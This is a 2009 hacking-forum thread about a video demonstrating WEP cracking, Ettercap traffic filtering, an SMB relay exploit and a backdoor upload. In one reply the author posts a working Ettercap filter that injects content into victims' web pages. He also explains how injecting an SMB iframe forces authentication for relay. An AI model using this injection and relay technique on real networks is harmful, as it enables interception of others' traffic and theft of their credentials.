Hacking illustrated video... wep-> exploit-> backdoor>

BigMac · #1 (**permalink**) 06-15-2009, 05:55 AM

This was just for fun... its not really a tutorial but more of a demonstration... i think i did a good job with this video... the music is epic Lol...

cracked wep...
filter traffic with ettercap and force smb authentication...
smb relay exploit...
upload tools for a secure back door...

enjoy and let me know what you think... im going to talk to Adrian Crenshaw's and see if he would like this video on his site...

direct link
http://vimeo.com/5154318

kelawezie · #2 (**permalink**) 10-20-2009, 06:34 AM

I liked it. Tought me some things i didnt know so thank you sir

operat0r · #3 (**permalink**) 10-20-2009, 06:15 PM

or just run wepbuster

0amoeba0 · #4 (**permalink**) 10-31-2009, 10:24 AM

What was the smb.filter? can you post the code?
Very nice video!!

B@Rz- · #5 (**permalink**) 11-03-2009, 07:07 PM

Cool blue backtrack

You should explain how did you know that your windows system was vulnerable to that exploit (there has been, for example, no nmap scan!), else there is no fun in watching only the ending in a film!

If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me

Reeth · #6 (**permalink**) 11-07-2009, 05:14 PM

Quote:

If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me

maybee it is my own inexperience, but as i tried Fast-Track out, Autopwn option didn't worked successfully on all my victim machines

yeah the smb.filter code would be interesting

BigMac · #7 (**permalink**) 12-13-2009, 10:14 AM

Quote:

Originally Posted by B@Rz-

Cool blue backtrack

You should explain how did you know that your windows system was vulnerable to that exploit (there has been, for example, no nmap scan!), else there is no fun in watching only the ending in a film!

If you want something that scans ports and tries to find active sessions to be exploited here's a tool called Fast-Track, it's really usefull for lazy people like me

fast track is awesome, there is a ettercap filter also used with fast-track

i did know port scan because the ettercap filter + smb exploit works when a vulnerable windows computer surfs the web... the traffic is filtered and i guess you can say a script is injected into the traffic witch will trigger a smb authentication trade off or handshake...

the filter below will simply filter all traffic on port 80 and inject new data on the fly in real time...

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
}
}

if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "</title>")) {
replace("</title>", "compile this script then run it with ettercap, surf the web on another computer and you will see this text at the top of every webpage");
msg("IFrame insertedn");
}}

for the exploit to work you need to replace an "iframe src"smb:ipaddress"> the authentication process will then happen...

Ps "this is my drunk typing"

cRaZylilmuffin · #8 (**permalink**) 12-13-2009, 10:46 AM

Cool vid.

Se7en-Mtl · #9 (**permalink**) 01-08-2010, 04:41 AM

Nice Vid BTW What is the Theme That you are using it is realy Nice

houzi88 · #10 (**permalink**) 02-01-2010, 09:13 AM

Nice video!

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode